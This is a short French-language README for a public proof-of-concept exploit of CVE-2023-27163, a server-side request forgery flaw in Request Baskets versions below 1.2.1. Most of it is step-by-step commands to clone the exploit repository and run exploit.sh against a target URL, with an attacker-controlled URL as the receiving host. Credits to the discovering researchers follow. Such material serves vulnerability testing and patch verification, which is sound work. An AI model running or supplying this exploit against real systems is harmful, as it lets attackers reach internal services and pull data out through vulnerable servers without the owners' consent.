
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF PoC
alt text
Les versions de Request Baskets <1.2.1 sont vulnérables aux attaques de Server Side Request Forgery (SSRF) via le composant /api/baskets/{name}.
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
Crédits à @beet1e de l'université Jiao Tong de Shanghai et à @chenlibo147 , @houqinsheng, [email protected] de l'université du Shandong. Article : https://notes.sjtu.edu.cn/s/MUUhEymt7#